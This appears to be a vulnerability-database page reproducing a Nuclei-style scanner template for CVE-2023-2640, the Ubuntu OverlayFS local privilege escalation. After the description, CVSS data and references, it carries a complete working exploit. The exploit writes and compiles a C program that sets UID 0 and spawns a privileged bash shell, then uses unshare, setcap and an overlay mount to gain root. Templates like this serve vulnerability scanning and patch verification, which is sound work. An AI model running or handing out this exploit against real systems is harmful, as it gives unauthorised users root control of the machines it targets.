A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
PoC代码[已公开]
id: CVE-2023-2640
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
impact: |
An attacker with local access can gain elevated privileges on the affected system.
remediation: |
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
reference:
- http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
- https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
- https://ubuntu.com/security/notices/USN-6250-1
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.92037
epss-percentile: 0.99695
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux"
tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
self-contained: true
code:
- engine:
- sh
- bash
source: |
id
- engine:
- sh
- bash
source: |
cd /tmp
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022025723ab91e420641cfe800cf358b555be4dfe1a95e19f497622513d576e1a18602210099c619aeaa31b5a42bfa1bf2435e943539edb17a8bb63d628639876b14b1dd0b:922c64590222798bb761d5b6d8e72950